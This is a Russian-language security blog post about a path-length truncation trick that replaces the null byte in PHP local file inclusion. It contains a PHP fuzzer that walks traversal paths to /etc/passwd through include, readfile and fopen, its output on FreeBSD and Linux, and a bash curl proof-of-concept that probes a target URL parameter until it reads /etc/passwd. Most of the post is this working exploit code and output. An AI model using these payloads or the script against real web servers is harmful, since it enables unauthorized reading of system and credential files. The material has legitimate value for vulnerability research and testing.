Другая альтернатива null-byte

Многие из вас, безусловно, помнят, как около года назад Raz0r поднял тему альтернативы "ядовитому нулю", а группа ush провела соответствующие исследования в этом направлении [1,2,3]. К слову, в это же время ваш покорный слуга пополнил новым методом базу знаний XSpider/MaxPatrol, дополнив реализацию метода своими наработками [4].

Так к чему я вновь затронул эту тему? Дело в том, что в упомянутом методе основная идея была затереть конец файла (расширение), который в свою очередь попадает в инклуд. Это возможно, потому как PHP использует нормализацию пути и не может обратиться к файлу превышающему MAX_PATH. А почему бы используя все те же ограничения PHP (длина MAX_PATH), не попробовать заполнить длину имени файла, но только от начала файла? Именно такая идея пришла в голову молодому человеку (Гольцев Юрий), которому был задан соответствующий вопрос на собеседовании. И ведь действительно! Это должно работать.

Для того чтобы проверить другую альтернативу null-byte я написал простенький фаззер:

<?<br /> error_reporting(E_NONE);<br /> $str = '';<br /> for ($i=0;$i<4096;$i++)<br /> {<br /> $str=$str.'n';<br /> $f = $str.'/../../../../../../../../../etc/passwd';<br /> #include()<br /> if (include($f.'.txt')) {<br /> print "\n".($i+1)."\tinclude(".$f.".txt)\n";<br /> }<br /> if (include('q/'.$f.'.txt')) {<br /> print "\n".($i+1)."\tinclude(q/".$f.".txt)\n";<br /> }<br /> if (include('qq/'.$f.'.txt')) {<br /> print "\n".($i+1)."\tinclude(qq/".$f.".txt)\n";<br /> }<br /> if (include('./'.$f.'.txt')) {<br /> print "\n".($i+1)."\tinclude(./".$f.".txt)\n";<br /> }<br /> #file_get_contents()<br /> if (file_get_contents($f.'.txt')) {<br /> print "\n".($i+1)."\tfile_get_contents(".$f.".txt)\n";<br /> }<br /> if (file_get_contents('q/'.$f.'.txt')) {<br /> print "\n".($i+1)."\tfile_get_contents(q/".$f.".txt)\n";<br /> }<br /> if (file_get_contents('qq/'.$f.'.txt')) {<br /> print "\n".($i+1)."\tfile_get_contents(qq/".$f.".txt)\n";<br /> }<br /> if (file_get_contents('./'.$f.'.txt')) {<br /> print "\n".($i+1)."\tfile_get_contents(./".$f.".txt)\n";<br /> }<br /> #include_once()<br /> if (include_once($f.'.txt')) {<br /> print "\n".($i+1)."\tinclude_once(".$f.".txt)\n";<br /> }<br /> if (include_once('q/'.$f.'.txt')) {<br /> print "\n".($i+1)."\tinclude_once(q/".$f.".txt)\n";<br /> }<br /> if (include_once('qq/'.$f.'.txt')) {<br /> print "\n".($i+1)."\tinclude_once(qq/".$f.".txt)\n";<br /> }<br /> if (include_once('./'.$f.'.txt')) {<br /> print "\n".($i+1)."\tinclude_once(./".$f.".txt)\n";<br /> }<br /> #readfile()<br /> if (readfile($f.'.txt')) {<br /> print "\n".($i+1)."\treadfile(".$f.".txt)\n";<br /> }<br /> if (readfile('q/'.$f.'.txt')) {<br /> print "\n".($i+1)."\treadfile(q/".$f.".txt)\n";<br /> }<br /> if (readfile('qq/'.$f.'.txt')) {<br /> print "\n".($i+1)."\treadfile(qq/".$f.".txt)\n";<br /> }<br /> if (readfile('./'.$f.'.txt')) {<br /> print "\n".($i+1)."\treadfile(./".$f.".txt)\n";<br /> }<br /> #fopen()<br /> if (fopen($f.'.txt','r')) {<br /> print "\n".($i+1)."\tfopen(".$f.".txt,'r')\n";<br /> }<br /> if (fopen('q/'.$f.'.txt','r')) {<br /> print "\n".($i+1)."\tfopen(q/".$f.".txt,'r')\n";<br /> }<br /> if (fopen('qq/'.$f.'.txt','r')) {<br /> print "\n".($i+1)."\tfopen(qq/".$f.".txt,'r')\n";<br /> }<br /> if (fopen('./'.$f.'.txt','r')) {<br /> print "\n".($i+1)."\tfopen(./".$f.".txt,'r')\n";<br /> }<br /> }<br /> ?><br />
Результаты его работы:

~ # uname -a
FreeBSD web.local 8.0-RELEASE-p2 FreeBSD 8.0-RELEASE-p2 #0: Wed Feb 10
 09:09:51 MSK 2010     root@pt.local:/usr/obj/usr/src/sys/LOCAL  i386
~ # php -v
PHP 5.2.12 with Suhosin-Patch 0.9.7 (cli) (built: Feb 17 2010 01:05:37)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies

include(qq/n[..960..]n/../../../../../../../../../etc/passwd.txt)
include_once(qq/n[..960..]n/../../../../../../../../../etc/passwd.txt)
include(q/n[..961..]n/../../../../../../../../../etc/passwd.txt)
include_once(q/n[..961..]n/../../../../../../../../../etc/passwd.txt)
include(n[..963..]n/../../../../../../../../../etc/passwd.txt)
include_once(n[..963..]n/../../../../../../../../../etc/passwd.txt)
include(qq/n[..971..]n/../../../../../../../../../etc/passwd.txt)
include_once(qq/n[..971..]n/../../../../../../../../../etc/passwd.txt)
include(q/n[..972..]n/../../../../../../../../../etc/passwd.txt)
include_once(q/n[..972..]n/../../../../../../../../../etc/passwd.txt)
include(n[..974..]n/../../../../../../../../../etc/passwd.txt)
include_once(n[..974..]n/../../../../../../../../../etc/passwd.txt)


~ # uname -a
Linux bt 2.6.21.5 #4 SMP Thu Apr 10 04:23:56 GMT 2008 i686 Intel(R)
 Pentium(R) M processor 1.86GHz GenuineIntel GNU/Linux
~ # php -v
PHP 5.2.4 (cli) (built: Sep 11 2007 21:55:04)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies


include(qq/n[..4041..]n/../../../../../../../../../etc/passwd.txt)
include_once(qq/n[..4041..]n/../../../../../../../../../etc/passwd.txt)
include(q/n[..4042..]n/../../../../../../../../../etc/passwd.txt)
include_once(q/n[..4042..]n/../../../../../../../../../etc/passwd.txt)
include(n[..4044..]n/../../../../../../../../../etc/passwd.txt)
include_once(n[..4044..]n/../../../../../../../../../etc/passwd.txt)
include(qq/n[..4048..]n/../../../../../../../../../etc/passwd.txt)
include_once(qq/n[..4048..]n/../../../../../../../../../etc/passwd.txt)
include(q/n[..4049..]n/../../../../../../../../../etc/passwd.txt)
include_once(q/n[..4049..]n/../../../../../../../../../etc/passwd.txt)
include(n[..4051..]n/../../../../../../../../../etc/passwd.txt)
include_once(n[..4051..]n/../../../../../../../../../etc/passwd.txt)

Нужно добавить, что для функций require() и require_once(), аналогично функциям include() и include_once(), приведенные выше данные справедливы в полном объеме.

И пример эксплуатации local file including обсуждаемым методом (proof of concept):

#!/usr/local/bin/bash<br /> file='/etc/passwd'<br /> str=`php -r "echo str_repeat('/..', 300);"`<br /> for ((i=1; i <= 100 ; i++)) do pre=$pre'n' URL="$1$pre$str$file" response=`curl -kis $URL | egrep "^root" | wc -l` if [ $response = 1 ]; then echo "Found: $URL"; fi done
bash poc.sh "http://192.168.0.51/test.php?file="

Как можно заметить – это работает!